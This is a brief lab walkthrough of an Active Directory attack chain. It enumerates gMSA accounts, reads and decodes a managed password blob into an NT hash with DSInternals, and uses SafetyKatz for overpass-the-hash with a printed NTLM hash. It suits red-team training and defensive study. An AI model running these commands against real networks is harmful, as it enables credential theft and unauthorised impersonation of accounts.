Enumerating The gMSA Accounts using PowerView

Get-DomainObject -LDAPFilter '(objectClass=msDS-GroupManagedServiceAccount)'

Now let’s see who is allowed to read the password blob using AD-Module

Get-ADServiceAccount -Identity shaaban.backup -Properties * | select PrincipalsAllowedToRetrieveManagedPassword

Notice that the user provisioning is allowed to retrieve the password blob on Jumpone Server

Now let’s read the password

$Passwordblob = (Get-ADServiceAccount -Identity gmsa_backup$ -Properties msDS-ManagedPassword).'msDS-ManagedPassword'
Import-Module C:\\AD\\Tools\\DSInternals_v4.7\\DSInternals\\DSInternals.psd1
$decodedpwd = ConvertFrom-ADManagedPasswordBlob $Passwordblob
ConvertTo-NTHash -Password $decodedpwd.SecureCurrentPassword

Now we retrieved the Managed Password of the Jumpone user

Now let’s OverPass-The-Hash

.\\SafetyKatz.exe "sekurlsa::pth /user:jumpone /ntlm:367032486cc36f7ba0561d7e3e90f615 /domain:us.techcorp.local /ptt"